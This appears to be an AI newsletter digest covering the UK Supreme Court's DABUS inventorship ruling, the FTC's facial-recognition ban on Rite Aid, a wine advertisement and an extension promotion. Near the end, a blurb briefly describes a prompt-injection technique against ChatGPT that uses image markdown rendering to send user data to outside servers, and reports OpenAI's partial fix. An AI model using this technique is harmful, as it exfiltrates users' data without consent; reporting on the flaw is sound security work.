The UK Supreme Court has ruled that artificial intelligence cannot be legally named as an inventor to secure patent rights. This decision was made in the case of US technologist Dr. Stephen Thaler, who had a dispute with the Intellectual Property Office (IPO) regarding his attempt to list an AI, named DABUS, as the inventor for two patents. Thaler claimed that DABUS autonomously created a food or drink container and a light beacon, and he should have rights over its inventions. However, the IPO rejected this, stating that an inventor must be a person under current law.
The high court and the court of appeal had previously upheld this decision in 2020 and 2021. The Supreme Court, in a unanimous decision, agreed with the IPO, stating that DABUS is not a person and did not devise any invention. Therefore, it could not be an inventor according to the Patents Act 1977. The court also dismissed Thaler’s argument that he should be entitled to the patents as the AI’s owner, noting that DABUS is a machine with no legal personality and Thaler has no independent right to a patent for any of its technical advances. This case was closely watched due to the increasing scrutiny of AI developments and their implications in various sectors.
Elevate your wine experience with grapes grown up to 9,000 ft in the Andes Mountains.
Some of the rarest, and finest: Yet most won’t make it to the US. But wine lover and adventurer Will Bonner has made it his mission to import unique, small-batch wines that other importers overlook.
And he’s sharing them through the Bonner Private Wine Partnership, where you’ll get these exclusive wines delivered right to your door.
The U.S. Federal Trade Commission (FTC) has imposed a five-year ban on Rite Aid’s use of facial recognition technology. This follows an investigation that revealed the drugstore chain’s use of the technology compromised customer privacy and security. The ban is pending approval due to Rite Aid’s Chapter 11 bankruptcy filing.
Rite Aid had been using facial recognition since 2012 in about 200 stores, often in lower-income, non-white neighborhoods. The FTC found that Rite Aid and two contractors created a watchlist database with images of customers allegedly involved in crimes at their stores, leading to false accusations and harassment of innocent customers. The system, which relied on poor-quality images from CCTV and mobile phone cameras, was criticized for frequent false positives and inherent biases, particularly against Black and Asian communities.
The FTC condemned Rite Aid for not informing customers about the technology and instructing employees to hide its use. Rite Aid, which had stopped using the technology three years before the investigation, agreed to the FTC’s decision but disagreed with some allegations. They are also required to delete all collected images and establish a strong data security program.
OpenAI seems to have implemented some mitigation steps for a well-known data exfiltration vulnerability in ChatGPT. Attackers can use image markdown rendering during prompt injection attacks to send data to third-party servers without the users’ consent.
The fix is not perfect, but a step in the right direction. In this post, the author shares what they figured out so far about the fix.
ChatGPT Tips and Tricks – Part 3: Timestamps and counters
Hope you enjoyed today’s newsletter
⚡️ Join over 200,000 people using the Superpower ChatGPT extension on Chrome and Firefox.